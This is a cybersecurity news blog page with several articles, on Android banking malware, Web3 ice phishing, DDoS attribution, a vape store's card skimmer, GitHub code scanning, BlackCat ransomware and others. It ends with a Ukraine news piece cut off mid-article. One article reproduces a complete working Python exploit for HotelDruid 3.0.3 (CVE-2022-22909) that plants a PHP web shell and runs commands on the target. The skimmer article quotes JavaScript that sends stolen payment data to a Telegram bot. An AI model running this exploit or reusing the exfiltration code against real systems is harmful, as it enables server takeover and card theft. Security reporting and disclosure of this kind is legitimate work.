Monday, January 20, 2025
Home Blog Page 45

New Android malware dubbed Xenomorph targets customers of 56 banks

By
Steven Black (n0tst3)
-
0
Xenomorph android malware

A New Android malware dubbed Xenomorph, served through Google Play Store has infected more than 50,000 Android devices to steal banking information.

Still in early development stage, Xenomorph is targeting users of dozens of financial institutions in Spain, Portugal, Italy, and Belgium.

Researchers at fraud and cybercrime prevention company ThreatFabric analyzing Xenomorph found code that is similar to Alien banking trojan. This suggests that the two threats are somehow connected: either Xenomorph is Alien’s successor or a developer has been working on both of them.

Banking trojans like Xenomorph aim to steal sensitive financial information, take over accounts, perform unauthorized transactions, and operators then sell the stolen data to interested buyers.

Sneaking into the Play Store

The Xenomorph malware entered the Google Play Store via generic performance-boosting applications such as the “Fast Cleaner”, which counts 50,000 installations.

Such utilities are a classic lure used by banking trojans, Alien included, because there’s always an interest in tools that promise to improve the performance of Android devices.

To evade rejection during the application review from the Play Store, Fast Cleaner is fetching the payload after installation, so the app is clean at submission time.

ThreatFabric recognized the application as a member of the “Gymdrop” dropper family, first discovered in November 2021, and observed pushing payloads that pose as Google Play, Chrome, or Bitcoin management apps.

Xenomorph capabilities

Xenomorph’s functionality is not full-blown at this point, as the trojan is under heavy development. However, it still represents a significant threat as it can fulfill its info-stealing purpose and it targets no less than 56 different European banks.

For example, the malware can intercept notifications, log SMS, and use injections to perform overlay attacks, so it can already snatch credentials and one-time passwords used to protect banking accounts.

After its installation, the first action taken by the app is to send back a list of the installed packages on the infected device to load the suitable overlays.

To achieve the above, the malware requests the granting of Accessibility Service permissions upon installation, and then abuses the privileges to grant itself additional permissions as needed.

Examples of commands present in the code but not yet implemented refer to keylogging functions and behavioral data collection.

Its Accessibility Engine is very detailed, and is designed with a modular approach in mind. It contains modules for each specific action required by the bot, and can be easily extended to support more functionalities. It would be unsurprising to see this bot sport semi-ATS capabilities in the very near future.

All in all, the malware may add next-level capabilities at any time, as only minor code implementations and modifications are required to activate extensive data siphoning functions.

ThreatFabric assesses that Xenomorph is not a strong threat at the moment due to its “under development” status. In time, though, it could reach its full potential, “comparable to other modern Android Banking trojans.”

To steer clear from Android malware that lurks in the Play Store, users should avoid installing apps that carry promises that are too good to be true. Checking other users’ reviews can sometimes help avoid malicious apps.

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Microsoft Warns of ‘Ice Phishing’ Threat on Web3 and Decentralized Networks

By
Steven Black (n0tst3)
-
0

ICE PHISHING: Microsoft has warned of emerging threats in the Web3 landscape, including “ice phishing” campaigns, as a surge in adoption of blockchain and DeFi technologies emphasizes the need to build security into the decentralized web while it’s still in its early stages.

The company’s Microsoft 365 Defender Research Team called out various new avenues through which malicious actors may attempt to trick cryptocurrency users into giving up their private cryptographic keys and carry out unauthorized fund transfers.

One aspect that the immutable and public blockchain enables is complete transparency, so an attack can be observed and studied after it occurred,” Christian Seifert, principal research manager at Microsoft’s Security and Compliance group, said. “It also allows assessment of the financial impact of attacks, which is challenging in traditional web2 phishing attacks.”

The theft of the keys could be carried out in several ways, including impersonating wallet software, deploying malware on victims’ devices, typosquatting legitimate smart contract front ends, and minting rogue digital tokens for Airdrop scams.

Ice Phishing

Another technique involves what Microsoft calls “ice phishing.” Rather than stealing a user’s private keys, the method works by deceiving the target into “signing a transaction that delegates approval of the user’s tokens to the attacker.”

“Once the approval transaction has been signed, submitted, and mined, the spender can access the funds,” Seifert elaborated. “In case of an ‘ice phishing’ attack, the attacker can accumulate approvals over a period of time and then drain all [the] victim’s wallets quickly.”

One such instance of ice phishing came to light in early December 2021 with the high-profile hack of Ethereum-based DeFi platform BadgerDAO, wherein a maliciously injected snippet using a compromised API key enabled the adversary to siphon $121 million in funds.

“The attacker deployed the worker script via a compromised API key that was created without the knowledge or authorization of Badger engineers,” BadgerDAO said. “The attacker(s) used this API access to periodically inject malicious code into the Badger application such that it only affected a subset of the user base.”

The script was programmed such that it would intercept Web3 transactions from wallets over a certain balance and insert a request to transfer the victim’s tokens to an address chosen by the attackers.

To mitigate threats affecting the blockchain technology, Microsoft is recommending users to review and audit the smart contracts for adequate incident response or emergency capabilities and periodically reassess and revoke token allowances.

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

U.S. Cybersecurity Agency, CISA, Publishes List of Free Security Tools and Services

By
Steven Black (n0tst3)
-
0
Cybersecurity

CISA Publishes List of Free Security Tools and Services The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday published a repository of free tools and services to enable organizations to mitigate, detect, and respond effectively to malicious attacks and further improve their security posture.

The “Free Cybersecurity Services and Tools” resource hub comprises a mix of services provided by CISA, open-source utilities, and other implements offered by private and public sector organizations across the cybersecurity community.

“Many organizations, both public and private, are target rich and resource poor,” CISA Director, Jen Easterly, said in a statement. “The resources on this list will help such organizations improve their security posture, which is particularly critical in the current heightened threat environment.”

The tools catalog is the latest in a string of initiatives launched by CISA to combat cyber threats and help organizations adopt foundational measures to maximize resilience by patching security flaws in software, enforcing multi-factor authentication, and halting bad practices.

To that end, the agency has launched dedicated portals documenting Known Exploited Vulnerabilities, “exceptionally risky” cybersecurity procedures, guidance for resisting ransomware infections as well as threats associated with nefarious information and influence operations.

Earlier this week, it also launched a “Shields Up” campaign notifying organizations in the U.S. of potential risks arising from cyber threats that can disrupt access to essential services and potentially result in impacts to public safety.

The development also comes as the agency released an alert detailing proactive steps that critical infrastructure entities can take to assess and mitigate threats related to information manipulation, while noting that the advancements in communications and networked systems have created new vectors for exploitation.

“Malicious actors may use tactics — such as misinformation, disinformation, and malinformation — to shape public opinion, undermine trust, and amplify division, which can lead to impacts to critical functions and services across multiple sectors,” CISA said.

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

White House and UK Gov attribute DDoS attacks on Ukraine to Russia’s GRU

By
Steven Black (n0tst3)
-
0
whitehouse
whitehouse

The White House has linked the recent DDoS attacks against Ukraine ‘s banks and defense agencies to Russia’s GRU

The White House has linked the recent DDoS attacks that took offline the sites of banks and defense agencies of Ukraine to Russia’s Main Directorate of the General Staff of the Armed Forces (aka GRU).

This week, the Ministry of Defense and the Armed Forces of Ukraine and state-owned banks, Privatbank (Ukraine’s largest bank) and Oschadbank were hit by Distributed Denial-of-Service (DDoS) attacks. The website of the Ukrainian Ministry of Defense has been taken down by the wave of DDoS attacks.

“The US government believes that Russian cyber actors likely have targeted the Ukrainian government, including military and critical infrastructure networks, to collect intelligence and preposition to conduct disruptive cyber activities,” said Anne Neuberger, the Biden administration’s deputy national security adviser for cyber and emerging technologies.

“We have technical information that links the Russian main intelligence directorate, or GRU, as known GRU infrastructure was seen transmitting high volumes of communication to Ukraine-based IP addresses and domains.”

Neuberger pointed out that the attacks are part of a broad strategy that aims at assisting destructive attacks in preparation for a military attack and consequent invasion.

“Russia likes to move in the shadows and counts on a long process of attribution. In light of that, we’re moving quickly to attribute the DDoS attacks,” Neuberger added.

“We do expect that should Russia decide to proceed with a further invasion of Ukraine, we may see further destabilizing or destructive cyber activity, and we’ve been working closely with allies and partners to ensure we’re prepared to call out that behavior and respond,” said Neuberger. “The global community must be prepared to shine a light on malicious cyber activity and hold actors accountable for any and all disruptive or destructive cyber activity,”

“And, as the President said earlier this week, if Russia attacks the United States or allies through asymmetric activities like disruptive cyberattacks against our companies or critical infrastructure, we are prepared to respond,” Neuberger continued.

The UK government also linked the DDoS attacks to Russian GRU.

“The UK Government judges that the Russian Main Intelligence Directorate (GRU) were involved in this week’s distributed denial of service attacks against the financial sector in Ukraine,” a Foreign, Commonwealth & Development Office spokesperson said. “The attack showed a continued disregard for Ukrainian sovereignty. This activity is yet another example of Russia’s aggressive acts against Ukraine.””

Ukraine’s SBU intelligence agency also attributed the DDoS attacks to Russia, but Moscow also denied any accusation.

The Security Service of Ukraine (SSU) today revealed the country is the target of an ongoing “wave of hybrid warfare” conducted by Russia-linked malicious actors. Threat actors aim at destabilizing the social contest in the country and instilling fear and untrust in the country’s government.

The SSU said the campaign is linked to Russian intelligence agencies that are spreading disinformation through social networks and other media.

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

HotelDruid RCE (Remote Code Execution) V3.0.3

By
Steven Black (n0tst3)
-
0

What Is Hotel Druid

Hoteldruid is an open-source program for hotel management (property management software) developed by DigitalDruid.Net

Vendor URL: hoteldruid.com

CVE RATING: 8.8/10

HotelDruid RCE PoC

# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)

# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909

#!/usr/bin/python3
import requests
import argparse

def login( target , username = "" , password = "", noauth=False):
	login_data = {
				"vers_hinc" : "1",
				"nome_utente_phpr" : username,
				"password_phpr" : password
				} 
	if not noauth:
		login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )
		if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:
			token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0]
			anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
			ret_data = {"token" : token , "anno" : anno}
			#print("ret data" + ret_data)
			return ret_data
		else:
			return False
	else:
		login_req = requests.get(f"{target}/inizio.php" , verify=False )
		try:
			anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
			token = ""
			ret_data = {"token" : token , "anno" : anno}
			return ret_data
		except:
			return False

def check_privilege(target , anno , token=""):
	priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)
	#print(priv_req.text)
	if "Modify" in priv_req.text:
		return True
	else:
		return False

def add_room(target , anno , token=""):
	add_room_data = { 
				"anno": anno,
				"id_sessione": token,
				"n_app":"{${system($_REQUEST['cmd'])}}",
				"crea_app":"SI",
				"crea_letti":"",
				"n_letti":"",
				"tipo_tabella":"appartamenti"
				}
	add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)
	#print(add_req.text)
	if "has been added" in add_req.text:
		return True
	else:
		return False
def test_code_execution(target):
	code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
	if "uid=" in code_execution_req.text:
		return code_execution_req.text.split("\n")[0]
	else:
		return False


def main():

	banner = """\n /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$
| $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$
| $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$  \ $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$
| $$$$$$$$ /$$__  $$|_  $$_/   /$$__  $$| $$      | $$  | $$ /$$__  $$| $$  | $$| $$ /$$__  $$
| $$__  $$| $$  \ $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  \__/| $$  | $$| $$| $$  | $$
| $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$
| $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$
|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
	

	parser = argparse.ArgumentParser()
	req_args = parser.add_argument_group('required arguments')
	req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)
	req_args.add_argument("-u" , "--username" , help="Username" , required=False)
	req_args.add_argument("-p" , "--password" , help="password", required=False)
	req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)
	args = parser.parse_args()                                                                         

	target = args.target
	if target[-1] == "/":
		target = target[:-1]
	noauth = args.noauth

	username = args.username
	password = args.password

	if noauth == False and (username == None or password == None):
		print('[-] Please provide the authentication method.' )
		quit()

	print(banner)
	if not noauth:
		print(f"[*] Logging in with the credential {username}:{password}")
		login_result = login(username = username , password = password , target = target)
		if login_result != False:
			token = login_result.get('token')
			anno = login_result.get('anno')
		else:
			print("[-] Login failed, Check your credential or check if login is required or not .")
			quit()
	else:
		print('[*] Trying to access the Dashboard.')
		login_result = login(username = username , password = password , target = target , noauth=True)
		if login_result != False:
			token = login_result.get('token')
			anno = login_result.get('anno') 
		else:
			print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
			exit()
	print("[*] Checking the privilege of the user.")
	if check_privilege(target= target , token=token , anno=anno):
		print("[+] User has the privilege to add room.")
	else:
		print("[-] User doesn't have the privilege to add room.")
		exit()
	print("[*] Adding a new room.")
	if add_room(target = target , anno=anno , token=token):
		print('[+] Room has been added successfully.')
	else:
		print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
		exit()
	print('[*] Testing code exection')
	output = test_code_execution(target = target)
	if output != False:
		print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
		print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
		print(f"[+] Example Output : {output}")
		exit()
	else:
		print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
		exit()
main()

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

ElementVape: Major e-cigarette store hacked to steal credit cards

By
Steven Black (n0tst3)
-
0
databreach

A prominent online seller  of e-cigarettes and vaping kits is serving a credit card skimmer on its live site, likely after getting hacked.

With its presence across the U.S. and Canada, Element Vape sells e-cigarettes, vaping devices, e-liquids, and CBD products in both retail outlets and on their online store.

Vaping site pulls in JavaScript to skim credit cards

Element Vape’s website is loading a malicious JavaScript file from a third-party website that appears to contain a credit card stealer.

Threat actors employing such credit card stealers on eCommerce stores by injecting scripts are referred to as Magecart.

Multiple webpages of the store, starting with the homepage, contain an obscure base64-encoded script that can be seen on lines 45-50 of the HTML source code shown below:

Malicious JS loaded by ElementVape.com (BleepingComputer)

It isn’t exactly known for how long has the malicious script been present on ElementVape.com.

Our analysis of ElementVape.com on Wayback Machine indicates the above code was absent as of February 5th 2022 and before. Therefore, the infection appears to be more recent, occurring sometime after the date and before getting discovered today.

When decoded, these six lines are simply pulling in the following JavaScript file, hosted on a third-party site:

//weicowire[.]com/js/jquery/frontend.js

The heavily obfuscated malicious payload resides in this frontend.js file towards the end:

Script exfiltrates payment data via Telegram

The above script, when decoded and analyzed by BleepingComputer, was seen collecting customers’ payment card and billing information on checkout.

Some of the fields that the script looks for include: email address, payment card number/expiration date, phone number, billing address including street and ZIP code.

This information is then exfiltrated to the attacker via an obfuscated, hardcoded Telegram address present in the script:

var x = new XMLHttpRequest();
    x.open("POST", "https://api.telegram.org/bot"+tbot+"/sendMessage", true);
    x.setRequestHeader('Content-Type', 'application/json; charset=utf-8');
    x.withCredentials = false;
var dd = JSON.stringify({ 
    chat_id: tchat,
    text: tmessage
 });
    x.send(dd);

Further, the script contains anti-reverse-engineering features that check if it is being run in a sandbox environment or “devtools” to deter analysis.

Large but obscure e-cig retailer

It isn’t clear how ElementVape.com’s backend code was malicously modified in the first place to sneak in the malicious script.

And, this is not the first time Element Vape has been compromised either.

In 2018, Element Vape customers reported receiving letters from the company stating that a data breach had occurred and the “window of intrusion between Dec 6, 2017 and June 27, 2018” potentially exposed customers’ personal information to threat actors. Element Vape confirmed the claims via what appears to be the company’s Reddit account.

Following this event, Illinois-based consumer Artur Tyksinski sued Element Vape alleging that the vaping retailer “failed to timely notify affected individuals of the data breach” and didn’t have adequate procedures in place to prevent unauthorized access to customers’ confidential information. This was followed by a class-action lawsuit in 2019, demanding a trial by jury.

Despite supposedly being “one of the world’s largest online Vape retailers” of e-cigarettes across retail stores and online, not much is readily known about Element Vape.

Known as TheSY LLC in some states, Element Vape’s Twitter account shows a following of more than 13,000 users.

But, oddly enough, their tweets are protected, making it harder to interact with the retailer.

Element Vape’s tweets are protected (Twitter)

he company, according to its website, is based in California and has been in operation since 2013.

“Our personal philosophy is to give consumers more than what they pay for. With an uncompromising drive to exceed expectations, we are committed to help [sic] customers experience the best possible shopping experience,” states Element Vape’s website.

Last year, the company partnered with PUDO (Picking Up or Dropping Off) Inc. to make its e-cigarettes and vaping goods available for “pick-up” across Canada’s PUDOpoint Counters.

BleepingComputer has notified Element Vape of the issue via its Zendesk support site, which at the time of our analysis, did not appear to contain the malicious script.

Since users may be actively shopping on the store, we believe it’s in the public interest to share details about this ongoing attack and prevent customers from getting their financial info stolen.

If you have recently made any purchases on the website, make sure to check your credit card transactions for any suspicious activity. Additionally, it’s worth sharing this article with those you know who vape.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

source

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

UK: Confidential patient data breached by ESNEFT staff

By
Steven Black (n0tst3)
-
0
data breach

CASES of snooping on confidential patient data at the trust which runs Colchester Hospital are among the highest in the country, figures reveal.

East Suffolk and North Essex Foundation Trust reported the country’s second-highest figure when it came to staff breaching patient privacy.

The Daily Mail revealed today incidents involved nosey employees looking up medical records of friends, family, colleagues and neighbours.

It said in total, 19 staff at the trust which also runs hospitals in Ipswich, Clacton and Harwich were disciplined between 2017 and 2018 for misuse of patient records.

Dr Martin Mansfield, Caldicott Guardian at the trust, said: “Patient confidentiality is a priority, and we have a number of policies in place to make sure we are safeguarding all our patients’ data and information.

“We take any patient data breach seriously, investigate thoroughly, and take action where needed.”

A Caldicott Guardian is a senior person responsible for protecting the confidentiality of people’s health and care information and making sure it is used properly.

Only 73 per cent – 158 of 215 – of the hospital trusts contacted responded to the Daily Mail’s Freedom of Information query.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

GitHub code scanning now finds more security vulnerabilities

By
Steven Black (n0tst3)
-
0

Code hosting platform GitHub today launched new machine learning-based code scanning analysis features that will automatically discover more common security vulnerabilities before they end up in production. 

These new experimental static analysis features are now available for JavaScript and TypeScript GitHub repositories in public beta.

GitHub Code Scanning Analysis

“With the new analysis capabilities, code scanning can surface even more alerts for four common vulnerability patterns: cross-site scripting (XSS), path injection, NoSQL injection, and SQL injection,” said GitHub’s Tiferet Gazit and Alona Hlobina.

“Together, these four vulnerability types account for many of the recent vulnerabilities (CVEs) in the JavaScript/TypeScript ecosystem, and improving code scanning’s ability to detect such vulnerabilities early in the development process is key in helping developers write more secure code.”

Security vulnerabilities discovered by the new experimental code analysis features will show up as alerts in the ‘Security’ tab of enrolled repositories. 

These new alerts are marked using an ‘Experimental’ label and will also be available via the pull requests tab.

Experimental code scanning alerts (GitHub)

he CodeQL code analysis engine, which powers GitHub’s code scanning, was added to the platform’s capabilities after GitHub acquired code-analysis platform Semmle in September 2019.

GitHub released the first code scanning beta at GitHub Satellite in May 2020 and announced its general availability four months later, in September 2020.

During beta testing, the code scanning feature was used to scan more than 12,000 repositories 1.4 million times and found over 20,000 security issues, including remote code execution (RCE), SQL injection, and cross-site scripting (XSS) flaws.

GitHub Code scanning is free for public repositories and is available as a GitHub Advanced Security feature for GitHub Enterprise private repositories.

To configure code analysis for your JavaScript/TypeScript code, you can follow these instructions. The new features are available for code scanning’s security-extended and security-and-quality analysis suites.

“It’s important to note that while we continue to improve and test our machine learning models, this new experimental analysis can have a higher false-positive rate relative to results from our standard CodeQL analysis,” Gazit and Hlobina added.

“As with most machine learning models, the results will improve over time.”

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

source

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Beware of the black cat ransomware: Dangerous and on the prowl

By
Steven Black (n0tst3)
-
0

Black Cat Ransomware: During February 2022,  Swissport was hit by a ransomware attack and the consequence of this led to flight delays and service disruption. BlackCat ransomware has now claimed they were behind the attack and stole data containing images of passports, internal business memos and personal information of job candidates.

Dubbed by some security analysts to be the “most sophisticated” ransomware group of 2021, BlackCat ransomware has already become quite infamous within the cybersecurity community. Earlier in February, some of its members confirmed the group was linked to the notorious BlackMatter operation. After this attack, it is likely the group will continue to strike, aiming for larger corporations or even government organizations.

Commenting on the activities of this group for Digital Journal is JP Perez-Etchegoyen, CTO at Onapsis. Perez-Etchegoyen outlines some of the possible methods of future attacks.

Perez-Etchegoyen considers the nature and complexity of the recent attack: “This attack further confirms that BlackCat ransomware is a highly sophisticated threat group that has become increasingly dangerous. Now with access to sensitive data like passports numbers, full names, and emails, it’s highly likely that BlackCat will be conducting additional malicious activities for monetary gain.”

Perez-Etchegoyen  adds that one reason why the attacks are successful is based on the detailed knowledge that the group members possess about business information technology. According to the analyst: “Recent research shows that BlackCat ransomware incorporates knowledge about SAP business applications to properly function. This is of particular concern, as business-critical applications, like those from SAP, contain vital data (financial, customer, product, employee, etc.) that keep enterprises running.”

Whilst these applications have transformed the way businesses operate, they can also introduce unnecessary risk if not properly managed and secured. Here Perez-Etchegoyen points out an additional vulnerability connected to updating SAP and other important systems: “Organizations are not purposeful when it comes to securing these applications, opening significant security gaps. This makes threats like ransomware far more dangerous, as attackers often seek to exploit unpatched business-critical applications to steal valuable data.”

There are different measures that can be adopted, and Perez-Etchegoyen presents these as: “To protect their mission-critical applications and their business from sophisticated ransomware groups like BlackCat, it’s crucial for enterprises to assess all systems in their SAP landscape for any cyber threats, including missing patches, broad authorizations, insecure integrations or misconfigurations, and immediately apply all relevant mitigations.” Lastly, Perez-Etchegoyen recommends: “Furthermore, they must incorporate a business-critical application security program into their overall cybersecurity strategy to ensure these applications are effectively and comprehensively protected.”

What is Ransomware & How Does It Work?

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

US challenges Russia to step back from Ukraine attack

By
Steven Black (n0tst3)
-
0
Russia Ukraine

The United States said Thursday that Russia is on the verge of unleashing a massive military attack against Ukraine, dismissing  Moscow’s claim to be pulling forces back, as artillery fire hit a Ukrainian kindergarten.

In a dramatic, previously unscheduled speech to the United Nations in New York, US Secretary of State Antony Blinken said intelligence showed Moscow could order an assault on its neighbor in the “coming days.”

Russian forces are taking part in joint military exercises with the military in Ukraine’s neighbour Belarus – Copyright AFP CARL DE SOUZA

With US and other Western governments saying they see no evidence to support Russia’s claim to be withdrawing, Blinken challenged the Kremlin to “announce today with no qualification, equivocation or deflection that Russia will not invade Ukraine. State it clearly. State it plainly to the world.”

“Demonstrate it by sending your troops, your tanks, your planes, back to their barracks and hangers, and sending your diplomats to the negotiating table,” he said.

President Joe Biden, at the White House, accused Moscow of preparing a “false flag operation” as a pretext for an attack and said this could happen “in the next several days.”

“They have not moved any of their troops out. They’ve moved more troops in,” Biden said. “Every indication we have is that they’re prepared to go into Ukraine.”

He added, however, that diplomacy is not dead. “There is a path. There is a way through this,” he said.

– ‘Forced to respond’ –

Russia has massed enormous air, land and sea forces around Ukraine. President Vladimir Putin and officials say they do not plan to invade Ukraine and that the troops are only conducting practice exercises.

However, Putin has made clear that the price for removing any threat would be Ukraine agreeing never to join NATO and for the Western alliance to pull back from a swath of eastern Europe, effectively splitting the continent into Cold War-style spheres of influence. Ukraine is far from being ready to join NATO but has set this is part of a broader goal to integrate with the democracies of western Europe, making a historic break from Russia’s orbit.

The United States said Thursday that it had received Putin’s response to its offers of a diplomatic solution to the crisis, but did not give any reaction to the contents.

The Russian foreign ministry indicated that there was little to discuss.

“In the absence of will on the American side to negotiate firm and legally binding guarantees on our security from the United States and its allies, Russia will be forced to respond, including with military-technical measures,” the foreign ministry said.

“We insist on the withdrawal of all US armed forces in Central Europe, Eastern Europe and the Baltics,” it added.

Russia also expelled the number two US diplomat in Moscow, the US State Department said, condemning the “unprovoked” action.

– Artillery fire on kindergarten –

Russia took over Ukraine’s Crimea region and began backing heavily armed separatists in the eastern Donetsk and Lugansk regions in 2014, sparking a war that has already cost thousands of lives.

Sporadic fighting remains common in the east and the Ukrainian army accused the pro-Russian separatists of 34 ceasefire breaches on Thursday, 28 of them using heavy weapons.

The potentially most serious incident — an example of the kind of spark that many fear could ignite far more intense fighting — was the shelling of a kindergarten in the village of Stanytsia-Luganska. Children were inside but none were hit.

Ukrainian President Volodymyr Zelensky tweeted that the attack “by pro-Russian forces is a big provocation.”

Russian news agencies meanwhile quoted authorities in the separatist Lugansk region saying they blamed Kyiv after the situation on the frontline “escalated significantly”.

US Defense Secretary Lloyd Austin described Thursday’s reports as “troubling”.

“We’ve said for some time that the Russians might do something like this in order to justify a military conflict. So we’ll be watching this very closely,” Austin told journalists after a meeting with NATO counterparts. 

Putin earlier this week claimed with no evidence that Ukraine is committing “genocide” in the eastern region.

– Disputed pull-out –

